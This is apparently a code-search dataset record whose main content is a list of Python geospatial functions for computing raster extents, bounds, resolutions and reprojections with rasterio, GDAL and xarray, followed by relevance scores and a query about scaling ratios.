dst_transform, width, height = \\\n rasterio.warp.calculate_default_transform(\n src_crs, dst_crs,\n ncols(ds), nrows(ds),\n resolution=res,\n dst_width=width,\n dst_height=height,\n **src_bounds._asdict())\n\n src_transform = get_transform(ds)\n src_dims = get_dims(ds)\n dst_crs = _parse_crs(dst_crs)\n\n #\n # Prepare new x and y coordinate arrays\n #\n dst_x, _ = dst_transform * (np.arange(width), np.zeros(width, dtype=int))\n _, dst_y = dst_transform * (np.zeros(height, dtype=int), np.arange(height))\n dst_coords = {'x': dst_x, 'y': dst_y}\n\n #\n # Handle the case where there are extra dimensions, e.g. 'time'\n # or 'band'\n #\n extra_dims = src_dims.keys() - {'y', 'x'}\n if len(extra_dims) == 0:\n dst_shape = (height, width)\n dst_dims = ('y', 'x')\n elif len(extra_dims) == 1:\n extra_dim = extra_dims.pop()\n dst_shape = (src_dims[extra_dim], height, width)\n dst_dims = (extra_dim, 'y', 'x')\n dst_coords[extra_dim] = ds.coords[extra_dim]\n else:\n raise ValueError('More than three dimensions are not supported.')\n\n def _reproject_da(da, shape):\n #\n # Reproject a single data array\n #\n extra_dims = set(da.dims) - {'y', 'x'}\n dim_order = tuple(extra_dims) + ('y', 'x')\n values = da.transpose(*dim_order).values\n output = np.zeros(shape, dtype=da.dtype)\n output[:] = np.nan\n\n # Fix data shape for one-dimensional data\n if da.ndim == 1:\n #\n # NOTE: The stretch factor is necessary because the input data\n # must extend at least half an original resolution cell in the\n # independent dimension.\n #\n if da.dims == ('x',):\n stretch_x = int((~src_transform * dst_transform).a / 2 + 1)\n values = np.vstack([values] * stretch_x)\n output.shape = (1,) + output.shape\n elif da.dims == ('y',):\n stretch_y = int((~src_transform * dst_transform).e / 2 + 1)\n values = np.vstack([values] * stretch_y).T\n output.shape = output.shape + (1,)\n\n rasterio.warp.reproject(\n values,\n output,\n src_transform=src_transform,\n src_crs=src_crs,\n dst_transform=dst_transform,\n dst_crs=dst_crs,\n dst_nodata=np.nan,\n **kwargs\n )\n\n # Final reshape in case the input was one-dimensional\n return output.reshape(shape)\n\n if isinstance(ds, xr.Dataset):\n result = xr.Dataset(coords=dst_coords)\n\n #\n # Also reproject coordinate arrays that are defined over\n # x and y\n #\n for v in ds.coords:\n #\n # If the projection is the same, also reproject coordinate arrays\n # that are defined over only one variable.\n #\n if dst_crs == src_crs and v not in ds.dims:\n if ds.coords[v].dims == ('x',):\n result.coords[v] = \\\n (('x',), _reproject_da(ds.coords[v], (width,)))\n elif ds.coords[v].dims == ('y',):\n result.coords[v] = \\\n (('y',), _reproject_da(ds.coords[v], (height,)))\n\n if not set(ds.coords[v].dims).issuperset({'x', 'y'}):\n continue\n\n shape = (height, width)\n result.coords[v] = (('y', 'x'),\n _reproject_da(ds.coords[v], shape))\n\n #\n # Reproject the actual data\n #\n for v in ds.data_vars:\n if set(ds[v].dims) == set(dst_dims):\n result[v] = (dst_dims, _reproject_da(ds[v], dst_shape))\n elif set(ds[v].dims) == {'y', 'x'}:\n shape = (height, width)\n result[v] = (dst_dims, _reproject_da(ds[v], shape))\n else:\n result[v] = (ds[v].dims, ds[v])\n\n #\n # Create lat and lon coordinates\n #\n # if 'lat' in ds.coords and 'lon' in ds.coords:\n # lon, lat = rasterio.warp.transform(\n # src_crs, dst_crs, ds.coords['x'], ds.coords['y'])\n # result.coords['lon'] = (('x',), lon)\n # result.coords['lat'] = (('y',), lat)\n\n elif isinstance(ds, xr.DataArray):\n result = xr.DataArray(_reproject_da(ds, dst_shape), dims=dst_dims,\n coords=dst_coords, name=ds.name)\n\n result.attrs = ds.attrs\n\n # Serialize transform to tuple and store in metadata\n result.attrs['transform'] = dst_transform[:6]\n # Store CRS info in metadata\n result.attrs['crs'] = dst_crs.to_string()\n result.attrs['coordinate_system_string'] = dst_crs.wkt\n # Store new data shape in metadata\n result.attrs['lines'] = nrows(result)\n result.attrs['samples'] = ncols(result)\n\n _add_latlon(result)\n\n return result", "def GetExtent(vDataSet):\r\n return [vDataSet.GetExtendMinX(),vDataSet.GetExtendMaxX(),\r\n vDataSet.GetExtendMinY(),vDataSet.GetExtendMaxY(),\r\n vDataSet.GetExtendMinZ(),vDataSet.GetExtendMaxZ()]", "def GetExtent(ds):\n xmin, xpixel, _, ymax, _, ypixel = ds.GetGeoTransform()\n width, height = ds.RasterXSize, ds.RasterYSize\n xmax = xmin + width * xpixel\n ymin = ymax + height * ypixel\n\n return (xmin, ymax), (xmax, ymax), (xmax, ymin), (xmin, ymin)", "def extent(self):\n return self.index.max() - self.index.min(), self.columns.max() - self.columns.min()", "def extent_to_gdal_transform(extent):\n\n # extent = SpatialExtent()\n\n pixel_height = math.copysign(extent.height, extent.bottom - extent.top)\n pixel_width = math.copysign(extent.width, extent.right - extent.left)\n\n transform = [extent.top, pixel_width, 0, extent.left, 0, pixel_height]\n return transform", "def extents(nodes):\n from numpy import min, max\n return ( min(nodes[:,0]), max(nodes[:,0]),\n min(nodes[:,1]), max(nodes[:,1]),\n min(nodes[:,2]), max(nodes[:,2]) )", "def extents(self):\n self._updateExtents()\n return self.mExtents", "def get_data_extent(self):\n raise NotImplementedError, \"Derived must override\"", "def GetResolution(vDataSet):\r\n xmin,xmax,ymin,ymax,zmin,zmax = GetExtent(vDataSet)\r\n nx,ny,nz = vDataSet.GetSizeX(),vDataSet.GetSizeY(),vDataSet.GetSizeZ()\r\n\r\n return (xmax-xmin)/nx, (ymax-ymin)/ny, (zmax-zmin)/nz", "def geoextent(self):\r\n return self.series_extent", "def return_extents(self):\n\n return [qm.tree.mins, qm.tree.maxs]", "def extent(self):\n return np.array(self._extent)", "def extent(self):\n return self._ax.extent", "def dataPointExtent(dataset):\n ext = tuple(np.flip(dataset.GetDimensions()))\n return ext", "def geotransform(self):\n return self._geotransform", "def _resolution(self):\n _, xres, _, _, _, yres = self.geotransform\n return xres, yres", "def GetNativeResolution(self, transform=None, maximum=None):\n # Get the source projection's units for a 1x1 pixel, assuming square\n # pixels.\n width, height = self.GetPixelDimensions()\n src_pixel_size = min(abs(width), abs(height))\n\n if transform is None:\n dst_pixel_size = src_pixel_size\n dst_ref = self.GetSpatialReference()\n else:\n # Transform these dimensions into the destination projection\n dst_pixel_size = transform.TransformPoint(src_pixel_size, 0)[0]\n dst_pixel_size = abs(dst_pixel_size)\n dst_ref = transform.dst_ref\n\n # We allow some floating point error between src_pixel_size and\n # dst_pixel_size based on the major circumference so that the error is\n # in the destination units\n error = max(*dst_ref.GetPixelDimensions(resolution=0)) / 128\n\n # Find the resolution where the pixels are smaller than dst_pixel_size.\n for resolution in count():\n if maximum is not None and resolution >= maximum:\n return resolution\n\n res_pixel_size = max(\n *dst_ref.GetPixelDimensions(resolution=resolution)\n )\n if (res_pixel_size - dst_pixel_size) <= error:\n return resolution\n\n # Halve error each resolution\n error /= 2", "def get_common_extent(datasets):\n common_bounds = get_common_bounds(datasets)\n common_crs = get_crs(datasets[0])\n dst_crs = CRS(init='epsg:4326')\n extent = rasterio.warp.transform_bounds(\n common_crs, dst_crs, **common_bounds._asdict()\n )\n return BoundingBox(*extent)", "def getCurrentExtent(self):\n if not self.currentBox:\n extent = None\n else:\n extent = boxToExtent(self.currentBox)\n return extent", "def extent(self):\r\n if not hasattr(self, '_extent'):\r\n self._extent = conf.lib.clang_getCursorExtent(self)\r\n\r\n return self._extent", "def Extrema(self):\n ymin = np.min(self._corners[:, 1])\n xmin = np.min(self._corners[:, 0])\n ymax = np.max(self._corners[:, 1])\n xmax = np.max(self._corners[:, 0])\n return ymin, xmin, ymax, xmax", "def bounding_box(self):\n frames = self.available_frames\n transform_0 = self.get_transform(frames[0], frames[1])\n try:\n bb = transform_0.bounding_box\n except NotImplementedError:\n return None\n if transform_0.n_inputs == 1:\n return bb\n try:\n axes_order = self.input_frame.axes_order\n except AttributeError:\n axes_order = np.arange(transform_0.n_inputs)\n # Model.bounding_box is in python order, need to reverse it first.\n return tuple(bb[::-1][i] for i in axes_order)", "def major_extent(self) -> complex:\n return max((self.max() - self.null, self.null - self.min()))", "def get_bounds(self):\n bottom_right = np.asarray([self.coords[k][0] for k in range(self.dim)])\n upper_left = np.asarray([self.coords[k][-1] for k in range(self.dim)])\n return bottom_right, upper_left", "def check_extent(self):\n if self.lower_left.x > self.upper_right.x:\n dlx = self.lower_left.x\n self.lower_left.x = self.upper_right.x\n self.upper_right.y = dlx\n\n if self.lower_left.y > self.upper_right.y:\n dly = self.lower_left.y\n self.lower_left.y = self.upper_right.y\n self.upper_right.y = dly", "def get_extent(georef, shape):\n extent = (\n georef[0],\n georef[3] +\n shape[1] *\n georef[5],\n georef[0] +\n shape[0] *\n georef[1],\n georef[3]) # x1,y1,x2,y2\n return extent", "def get_extent(fpath):\n extents = []\n with h5py.File(fpath, mode='r') as f:\n for key, value in f['label/label-0'].attrs.items():\n if key.lower().endswith('extent') and isinstance(value, np.ndarray):\n extents.append(value)\n \n extents = np.stack(extents, axis=0)\n maxs = np.max(extents, axis=0)\n mins = np.min(extents, axis=0)\n axis_slices = []\n for min_, max_ in zip(mins[::2], maxs[1::2]):\n axis_slices.append(slice(min_, max_, 1))\n return tuple(axis_slices)", "def extent(self) -> typing.Tuple[str, ...]:\n return self._extent.members()", "def bbox(self):\n return np.array(self.path.get_extents()).ravel(order='F')", "def fetchbounds(self):\n pnts = [x for x in [self.out_start, self.start, self.in_start, \\\n self.in_end, self.end, self.out_end] \\\n if x is not None]\n return min(pnts), max(pnts)", "def pivot_grid_bound(param=None, extent=10.0):\n\n # No pivot set.\n if not hasattr(cdp, param):\n raise RelaxError(\"The pivot point has not been set, cannot determine the grid search bounds.\")\n\n # The value.\n val = getattr(cdp, param)\n\n # Return the bound.\n return val + extent", "def getBounds(self, srs=None):\n if srs not in self._bounds:\n gt = self._getGeoTransform()\n nativeSrs = self.getProj4String()\n if not nativeSrs:\n self._bounds[srs] = None\n return\n bounds = {\n 'll': {\n 'x': gt[0] + self.sourceSizeY * gt[2],\n 'y': gt[3] + self.sourceSizeY * gt[5],\n },\n 'ul': {\n 'x': gt[0],\n 'y': gt[3],\n },\n 'lr': {\n 'x': gt[0] + self.sourceSizeX * gt[1] + self.sourceSizeY * gt[2],\n 'y': gt[3] + self.sourceSizeX * gt[4] + self.sourceSizeY * gt[5],\n },\n 'ur': {\n 'x': gt[0] + self.sourceSizeX * gt[1],\n 'y': gt[3] + self.sourceSizeX * gt[4],\n },\n 'srs': nativeSrs,\n }\n # Make sure geographic coordinates do not exceed their limits\n if self._proj4Proj(nativeSrs).crs.is_geographic and srs:\n try:\n self._proj4Proj(srs)(0, 90, errcheck=True)\n yBound = 90.0\n except RuntimeError:\n yBound = 89.999999\n keys = ('ll', 'ul', 'lr', 'ur')\n for key in keys:\n bounds[key]['y'] = max(min(bounds[key]['y'], yBound), -yBound)\n while any(bounds[key]['x'] > 180 for key in keys):\n for key in keys:\n bounds[key]['x'] -= 360\n while any(bounds[key]['x'] < -180 for key in keys):\n for key in keys:\n bounds[key]['x'] += 360\n if any(bounds[key]['x'] >= 180 for key in keys):\n bounds['ul']['x'] = bounds['ll']['x'] = -180\n bounds['ur']['x'] = bounds['lr']['x'] = 180\n if srs and srs != nativeSrs:\n inProj = self._proj4Proj(nativeSrs)\n outProj = self._proj4Proj(srs)\n keys = ('ll', 'ul', 'lr', 'ur')\n pts = pyproj.Transformer.from_proj(inProj, outProj, always_xy=True).itransform([\n (bounds[key]['x'], bounds[key]['y']) for key in keys])\n for idx, pt in enumerate(pts):\n key = keys[idx]\n bounds[key]['x'] = pt[0]\n bounds[key]['y'] = pt[1]\n bounds['srs'] = srs.decode() if isinstance(srs, bytes) else srs\n bounds['xmin'] = min(bounds['ll']['x'], bounds['ul']['x'],\n bounds['lr']['x'], bounds['ur']['x'])\n bounds['xmax'] = max(bounds['ll']['x'], bounds['ul']['x'],\n bounds['lr']['x'], bounds['ur']['x'])\n bounds['ymin'] = min(bounds['ll']['y'], bounds['ul']['y'],\n bounds['lr']['y'], bounds['ur']['y'])\n bounds['ymax'] = max(bounds['ll']['y'], bounds['ul']['y'],\n bounds['lr']['y'], bounds['ur']['y'])\n self._bounds[srs] = bounds\n return self._bounds[srs]", "def get_resolution(ds):\n\n if 'x' in ds.coords and 'y' in ds.coords:\n x = ds.coords['x'].values\n y = ds.coords['y'].values\n resx = abs(x[-1] - x[0]) / (len(x) - 1)\n resy = abs(y[-1] - y[0]) / (len(y) - 1)\n return (resx, resy)\n else:\n transform = get_transform(ds)\n if transform is not None:\n return (abs(transform.a), abs(transform.e))\n elif 'res' in ds.attrs:\n return ds.attrs['res']\n\n return None", "def map_extent(input_raster):\n\n gdal.UseExceptions()\n raster = gdal.Open(input_raster)\n raster_geotransform = raster.GetGeoTransform()\n raster_extent = (raster_geotransform[0],\n raster_geotransform[0]\n + raster.RasterXSize * raster_geotransform[1],\n raster_geotransform[3]\n + raster.RasterYSize * raster_geotransform[5],\n raster_geotransform[3])\n\n return raster_extent", "def get_bounds(self):\n return self._geometry.bounds", "def transformed_bounds(self):\n b = []\n\n for dim in self.dimensions:\n if dim.transformed_size == 1:\n b.append(dim.transformed_bounds)\n else:\n b.extend(dim.transformed_bounds)\n\n return b", "def _get_inv_gt(self):\r\n # Geotransform the original map\r\n self.in_gt = self.in_ds.GetGeoTransform()\r\n # Create an inverse geotransform for the raster.\r\n # This converts real-world coordinates to pixel offsets.\r\n self.inv_gt = gdal.InvGeoTransform(self.in_gt)\r\n if gdal.VersionInfo()[0] == '1':\r\n if self.inv_gt[0] == 1:\r\n self.inv_gt = self.inv_gt[1]\r\n else:\r\n raise RuntimeError('Inverse geotransform failed')\r\n elif self.inv_gt is None:\r\n raise RuntimeError('Inverse geotransform failed')", "def extent(obj):\n return obj.get('startOffset', -1), obj.get('endOffset', -1)", "def extent(obj):\n return obj.get('startOffset', -1), obj.get('endOffset', -1)", "def get_bounds(self):\n\n northing=self.f.variables['y']\n easting=self.f.variables['x']\n\n lat1,lon1 = utm.to_latlon(np.min(easting),np.min(northing),11,northern=True)\n lat2,lon2 = utm.to_latlon(np.max(easting),np.max(northing),11,northern=True)\n\n return (lon1,lon2,lat1,lat2)", "def get_absolute_poses(self):\n if self.backend is not None:\n return self.backend.absolute_poses()\n return compute_absolute_poses(self.odometry.get_relative_poses())", "def bounds(self):\n return self.xmin, self.xmax, self.ymin, self.ymax", "def dataCellExtent(dataset):\n # Subtracting 1 from GetDimensions accounts for point-counts\n # vs cell-counts, while np.flip(...) switches the axis order:\n ext = tuple(np.flip(dataset.GetDimensions()) - 1)\n return ext", "def get_bounds(self, crs=\"default\"):\n\n if crs == \"default\":\n crs = podpac.settings[\"DEFAULT_CRS\"]\n\n bounds = {}\n for coords in self.find_coordinates():\n ct = coords.transform(crs)\n for dim, (lo, hi) in ct.bounds.items():\n if dim not in bounds:\n bounds[dim] = (lo, hi)\n else:\n bounds[dim] = (min(lo, bounds[dim][0]), max(hi, bounds[dim][1]))\n\n return bounds, crs", "def get_extents(self, p, x, y, z, w, h):\n x.value, y.value, z.value, w.value, h.value = self._get_extents(p, x.value, y.value, z.value, w.value, h.value)", "def projection(self):\n return self.dataset.GetProjection() if self.dataset else None", "def _get_dimensions(self):\n corners = []\n for module in self.modules:\n for tile in module:\n corners.append(tile.corners())\n corners = np.concatenate(corners)[:, :2] / self._pixel_shape\n\n # Find extremes, add 1 px margin to allow for rounding errors\n min_xy = corners.min(axis=0).astype(int) - 1\n max_xy = corners.max(axis=0).astype(int) + 1\n\n size = max_xy - min_xy\n centre = -min_xy\n # Switch xy -> yx\n return tuple(size[::-1]), centre[::-1]", "def projection(self):\n return self._map_projection", "def projection(self):\n return self._map_projection", "def getExtentUnits(self):\n return _libsbml.Model_getExtentUnits(self)", "def get_height():\n return resize.transforms[1].size", "def _set_lim_and_transforms(self):\n # There are three important coordinate spaces going on here:\n #\n # 1. Data space: The space of the data itself\n #\n # 2. Axes space: The unit rectangle (0, 0) to (1, 1)\n # covering the entire plot area.\n #\n # 3. Display space: The coordinates of the resulting image,\n # often in pixels or dpi/inch.\n\n # This function makes heavy use of the Transform classes in\n # ``lib/matplotlib/transforms.py.`` For more information, see\n # the inline documentation there.\n\n # The goal of the first two transformations is to get from the\n # data space (in this case longitude and latitude) to axes\n # space. It is separated into a non-affine and affine part so\n # that the non-affine part does not have to be recomputed when\n # a simple affine change to the figure has been made (such as\n # resizing the window or changing the dpi).\n\n # 1) The core transformation from data space into\n # rectilinear space defined in the HammerTransform class.\n self.transProjection = IdentityTransform()\n # 2) The above has an output range that is not in the unit\n # rectangle, so scale and translate it so it fits correctly\n # within the axes. The peculiar calculations of xscale and\n # yscale are specific to a Aitoff-Hammer projection, so don't\n # worry about them too much.\n self.transAffine = Affine2D.from_values(\n 1., 0, 0.5, np.sqrt(3)/2., 0, 0)\n self.transAffinedep = Affine2D.from_values(\n 1., 0, -0.5, np.sqrt(3)/2., 0, 0)\n #self.transAffine = IdentityTransform()\n \n # 3) This is the transformation from axes space to display\n # space.\n self.transAxes = BboxTransformTo(self.bbox)\n\n # Now put these 3 transforms together -- from data all the way\n # to display coordinates. Using the '+' operator, these\n # transforms will be applied \"in order\". The transforms are\n # automatically simplified, if possible, by the underlying\n # transformation framework.\n self.transData = \\\n self.transProjection + \\\n self.transAffine + \\\n self.transAxes\n\n # The main data transformation is set up. Now deal with\n # gridlines and tick labels.\n\n # Longitude gridlines and ticklabels. The input to these\n # transforms are in display space in x and axes space in y.\n # Therefore, the input values will be in range (-xmin, 0),\n # (xmax, 1). The goal of these transforms is to go from that\n # space to display space. The tick labels will be offset 4\n # pixels from the equator.\n\n self._xaxis_pretransform = IdentityTransform()\n self._xaxis_transform = \\\n self._xaxis_pretransform + \\\n self.transData\n self._xaxis_text1_transform = \\\n Affine2D().scale(1.0, 0.0) + \\\n self.transData + \\\n Affine2D().translate(0.0, -20.0)\n self._xaxis_text2_transform = \\\n Affine2D().scale(1.0, 0.0) + \\\n self.transData + \\\n Affine2D().translate(0.0, -4.0)\n\n # Now set up the transforms for the latitude ticks. The input to\n # these transforms are in axes space in x and display space in\n # y. Therefore, the input values will be in range (0, -ymin),\n # (1, ymax). The goal of these transforms is to go from that\n # space to display space. The tick labels will be offset 4\n # pixels from the edge of the axes ellipse.\n\n self._yaxis_transform = self.transData\n yaxis_text_base = \\\n self.transProjection + \\\n (self.transAffine + \\\n self.transAxes)\n self._yaxis_text1_transform = \\\n yaxis_text_base + \\\n Affine2D().translate(-8.0, 0.0)\n self._yaxis_text2_transform = \\\n yaxis_text_base + \\\n Affine2D().translate(8.0, 0.0)", "def get_bounds(ds):\n\n trans = get_transform(ds)\n if trans is not None:\n if isinstance(ds, xr.Dataset):\n dims = ds.dims\n elif isinstance(ds, xr.DataArray):\n dims = dict(zip(ds.dims, ds.shape))\n nrows = dims['y']\n ncols = dims['x']\n corners = (np.array([0, 0, ncols-1, ncols-1]),\n np.array([0, nrows-1, 0, nrows-1]))\n corner_x, corner_y = trans * corners\n return BoundingBox(\n left=corner_x.min(),\n bottom=corner_y.min(),\n right=corner_x.max(),\n top=corner_y.max()\n )\n else:\n return BoundingBox(\n left=ds['x'].min(),\n bottom=ds['y'].min(),\n right=ds['x'].max(),\n top=ds['y'].max()\n )", "def get_geo_bounds(self, extent=None, data_sel=None):\n if self.science_product:\n res = self.__nc_geo_bounds(extent, data_sel)\n else:\n res = self.__h5_geo_bounds(extent, data_sel)\n data_sel, lon_bounds, lat_bounds = res\n\n res = {}\n _sz = lon_bounds.shape\n res['longitude'] = np.empty((_sz[0]+1, _sz[1]+1), dtype=np.float)\n res['longitude'][:-1, :-1] = lon_bounds[:, :, 0]\n res['longitude'][-1, :-1] = lon_bounds[-1, :, 1]\n res['longitude'][:-1, -1] = lon_bounds[:, -1, 1]\n res['longitude'][-1, -1] = lon_bounds[-1, -1, 2]\n\n res['latitude'] = np.empty((_sz[0]+1, _sz[1]+1), dtype=np.float)\n res['latitude'][:-1, :-1] = lat_bounds[:, :, 0]\n res['latitude'][-1, :-1] = lat_bounds[-1, :, 1]\n res['latitude'][:-1, -1] = lat_bounds[:, -1, 1]\n res['latitude'][-1, -1] = lat_bounds[-1, -1, 2]\n\n if extent is None:\n return res\n\n return data_sel, res", "def bottomLeftCorner(self):\n self._updateExtents()\n return (self._mMinX,self._mMaxY)", "def minor_extent(self) -> complex:\n return min((self.max() - self.null, self.null - self.min()))", "def get_transform(self, map_from='visual', map_to='render'):\n return self.transforms.get_transform(map_from, map_to)", "def coord_proj(self):\r\n return self._coord_proj", "def size(self):\n return self.__xmax, self.__ymax", "def width_height(bounds):\n try:\n geom = reproject_geometry(\n box(*bounds), src_crs=tile.crs, dst_crs=dst_pyramid.crs\n )\n if geom.is_empty: # Shapely>=2.0\n raise ValueError(\"geometry empty after reprojection\")\n l, b, r, t = geom.bounds\n except ValueError: # pragma: no cover\n raise TopologicalError(\"bounds cannot be translated into target CRS\")\n return r - l, t - b", "def domain_bounds(self):\n return self._xmin, self._xmax, self._ymin, self._ymax, self._zmin, self._zmax", "def bounds(self):\n \n return self.osmdb.bounds()", "def get_bounding_box(self):\n if len(self.polygons) == 0:\n return None\n return numpy.array(((min(pts[:, 0].min() for pts in self.polygons),\n min(pts[:, 1].min() for pts in self.polygons)),\n (max(pts[:, 0].max() for pts in self.polygons),\n max(pts[:, 1].max() for pts in self.polygons))))", "def get_bbox(self, obj):\n renderer = self.figure.canvas.get_renderer()\n transformer = self.figure.dpi_scale_trans.inverted()\n return obj.get_window_extent(renderer=renderer).transformed(transformer)", "def geo_transform(self):\n pass", "def get_object_bounds(self):\n if len(self._object_bounds) == 0:\n # Nothing plotted yet\n return -.01, .01, -.01, .01\n xmins, xmaxs, ymins, ymaxs = np.array(self._object_bounds).T\n xmax = max(xmaxs.max(), xmins.max())\n xmin = min(xmins.min(), xmaxs.min())\n ymax = max(ymaxs.max(), ymins.max())\n ymin = min(ymins.min(), ymaxs.min())\n return xmin, xmax, ymin, ymax", "def get_projection(self):\n return self.projection", "def get_bbox(self):\n dimsizes = self.get_full_dimensions('lon').values()\n slices = [slice(None, None, dimsizes[0] - 1),\n slice(None, None, dimsizes[1] - 1)]\n lon = self.read_values('lon', slices=slices)\n lat = self.read_values('lat', slices=slices)\n return (lon.min(), lat.min(), lon.max(), lat.max())", "def getCurrentTransformSelection():\n node = cmds.ls(sl=True)\n if node:\n node = node[0]\n if cmds.nodeType(node) == 'transform':\n xform = node\n return xform\n else:\n relatives = cmds.listRelatives(node, shapes=True, f=1)\n if relatives:\n for i in relatives:\n if cmds.nodeType(i) == \"transform\":\n xform = i\n return xform\n return None", "def GetTransform(*args, **kwargs):\n return _gdi_.GraphicsContext_GetTransform(*args, **kwargs)", "def extent(self, **kwargs) -> gpd.GeoDataFrame:\n return gpd.GeoDataFrame(\n geometry=[box(*self.footprint().total_bounds)],\n crs=self.crs(),\n )" ]
[ "0.6707964", "0.62306535", "0.61376554", "0.58643377", "0.58163196", "0.5813695", "0.5760055", "0.5748703", "0.57084984", "0.5700975", "0.56836563", "0.5661239", "0.5635688", "0.5632432", "0.56189066", "0.5601325", "0.55867517", "0.5552704", "0.5544527", "0.5532464", "0.5512576", "0.55049706", "0.5500104", "0.54963976", "0.543696", "0.5405108", "0.5398917", "0.5361915", "0.5324615", "0.5324042", "0.5311395", "0.53015083", "0.53008103", "0.525847", "0.5256349", "0.5168529", "0.51329", "0.5121131", "0.51191145", "0.50949913", "0.5094101", "0.5085745", "0.50824857", "0.50582695", "0.50466925", "0.5046534", "0.5015328", "0.49839884", "0.4968262", "0.49595347", "0.4958106", "0.49522194", "0.49258733", "0.4920959", "0.4880789", "0.48775324", "0.48737133", "0.48336482", "0.48261192", "0.47992152", "0.47977766", "0.47870633", "0.47668493", "0.47567892", "0.47476017", "0.4736752", "0.47305942", "0.47305942", "0.47125965", "0.4637063", "0.46341562", "0.46230805", "0.4607761", "0.46064207", "0.4593204", "0.4582184", "0.45808795", "0.45808795", "0.4580255", "0.45729274", "0.45721936", "0.45712063", "0.45556805", "0.45551962", "0.4549101", "0.45418063", "0.453897", "0.45109153", "0.4503543", "0.45027548", "0.44981578", "0.44780275", "0.44776282", "0.4464994", "0.44619098", "0.44449311", "0.44213164", "0.4418409", "0.44175324", "0.4414818" ]
0.75209373
0
Get the scaling ratios required to upsample an image to `resolution`. If resolution is None, then assume it will be upsampled to the native destination resolution. See Dataset.GetNativeResolution() If places is not None, rounds the ratios to the number of decimal places specified.
def GetScalingRatios(self, resolution=None, places=None): if resolution is None: resolution = self.GetNativeResolution(transform=None) # Get the pixel dimensions in map units. There is no custom transform, # because it makes no sense to compute a pixel ratio for a # reprojection. spatial_ref = self.GetSpatialReference() dst_pixel_width, dst_pixel_height = spatial_ref.GetPixelDimensions( resolution=resolution ) src_pixel_width, src_pixel_height = self.GetPixelDimensions() xscale = abs(src_pixel_width / dst_pixel_width) yscale = abs(src_pixel_height / dst_pixel_height) if places is not None: xscale = round(xscale, places) yscale = round(yscale, places) return XY(x=xscale, y=yscale)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def GetWorldScalingRatios(self, resolution=None, places=None):\n if resolution is None:\n resolution = self.GetNativeResolution()\n\n spatial_ref = self.GetSpatialReference()\n world = spatial_ref.GetWorldExtents().dimensions\n src_pixel_sizes = XY(x=world.x / self.RasterXSize,\n y=world.y / self.RasterYSize)\n dst_pixel_sizes = spatial_ref.GetPixelDimensions(resolution=resolution)\n\n xscale = abs(src_pixel_sizes.x / dst_pixel_sizes.x)\n\n # Make sure that yscale fits within the whole world\n yscale = min(xscale, abs(src_pixel_sizes.y / dst_pixel_sizes.y))\n\n if places is not None:\n xscale = round(xscale, places)\n yscale = round(yscale, places)\n\n return XY(x=xscale, y=yscale)", "def _compute_output_resolution(input_spatial_resolution, kernel_size, stride,\n total_padding):\n if (input_spatial_resolution is None) or (kernel_size is None) or (\n stride is None) or (total_padding is None):\n return None\n return int(\n math.ceil((\n input_spatial_resolution + total_padding - kernel_size + 1) / stride))", "def change_resolution(img):\n scale_factor = np.random.choice(list(range(0, 6, 2)))\n if scale_factor == 0:\n return img\n downsample = nn.AvgPool2d(scale_factor)\n upsample = nn.UpsamplingNearest2d(scale_factor=scale_factor)\n new_res_img = upsample(downsample(img.unsqueeze(dim=1))).squeeze()\n return new_res_img", "def raw_resolution(resolution, splitter=False):\n width, height = resolution\n if splitter:\n fwidth = (width + 15) & ~15\n else:\n fwidth = (width + 31) & ~31\n fheight = (height + 15) & ~15\n return fwidth, fheight", "def compute_resolution(zoom, size_px):\n # Calibration data:\n dist_in_um = 10\n dist_in_px = np.array([21.13, 19.62, 8.93])\n zooms = np.array([1.5, 3, 4.5])\n image_max_sizes = np.array([330, 610, 410])\n \n return np.mean((dist_in_um/dist_in_px) * (zoom/zooms) * (image_max_sizes/size_px))", "def UResolution(self, *args):\n return _Adaptor3d.Adaptor3d_Surface_UResolution(self, *args)", "def resolution_range(self) -> Optional[float]:\n return self._get_property(RESOLUTION_RANGE_PROP, float)", "def _get_scaling(root):\n dpi = root.winfo_fpixels(\"1i\")\n scaling = dpi / 72.0\n logger.debug(\"dpi: %s, scaling: %s'\", dpi, scaling)\n return scaling", "def downscale_resolution(self, downscale_resolution):\n\n self._downscale_resolution = downscale_resolution", "def getResolution(self):\n return self.resolution", "def effective_resolution(self) -> Tuple[int, int]:\n import numpy as np\n\n assert self.info.resolution, 'No base resolution specified'\n rot = (self.info.rotate or 0) * math.pi / 180\n sin = math.sin(rot)\n cos = math.cos(rot)\n scale = np.array([[self.info.scale_x or 1.0, self.info.scale_y or 1.0]])\n resolution = np.array([[self.info.resolution[0], self.info.resolution[1]]])\n rot_matrix = np.array([[sin, cos], [cos, sin]])\n resolution = (scale * abs(np.cross(rot_matrix, resolution)))[0]\n return int(round(resolution[0])), int(round(resolution[1]))", "def GetResolution(vDataSet):\r\n xmin,xmax,ymin,ymax,zmin,zmax = GetExtent(vDataSet)\r\n nx,ny,nz = vDataSet.GetSizeX(),vDataSet.GetSizeY(),vDataSet.GetSizeZ()\r\n\r\n return (xmax-xmin)/nx, (ymax-ymin)/ny, (zmax-zmin)/nz", "def getResolution(self):\n return self._lowLevelGetDeviceResolution()", "def extend_to_grid(self, resolution):\n return Bounds(\n min_value = math.floor(self.min/resolution)*resolution,\n max_value = math.ceil(self.max/resolution)*resolution\n )", "def round_filters(filters, global_params):\n multiplier = global_params.width_coefficient\n if not multiplier:\n return filters\n divisor = global_params.depth_divisor\n min_depth = global_params.min_depth\n filters *= multiplier\n min_depth = min_depth or divisor\n new_filters = max(min_depth, int(filters + divisor / 2) // divisor * divisor)\n if new_filters < 0.9 * filters: # prevent rounding by more than 10%\n new_filters += divisor\n return int(new_filters)", "def round_filters(filters, global_params):\n multiplier = global_params.width_coefficient\n if not multiplier:\n return filters\n divisor = global_params.depth_divisor\n min_depth = global_params.min_depth\n filters *= multiplier\n min_depth = min_depth or divisor\n new_filters = max(min_depth, int(filters + divisor / 2) // divisor * divisor)\n if new_filters < 0.9 * filters: # prevent rounding by more than 10%\n new_filters += divisor\n return int(new_filters)", "def round_filters(filters, global_params):\n multiplier = global_params.width_coefficient\n if not multiplier:\n return filters\n divisor = global_params.depth_divisor\n min_depth = global_params.min_depth\n filters *= multiplier\n min_depth = min_depth or divisor\n new_filters = max(min_depth, int(filters + divisor / 2) // divisor * divisor)\n if new_filters < 0.9 * filters: # prevent rounding by more than 10%\n new_filters += divisor\n return int(new_filters)", "def zoom(self):\n res = np.max(self.metadata[\"resolution\"])\n\n if self.atlas_name == \"allen_human_500um\":\n logger.debug(\n \"ATLAS: setting zoom manually for human atlas, atlas needs fixing\"\n )\n return 350\n else:\n return 40 / res", "def 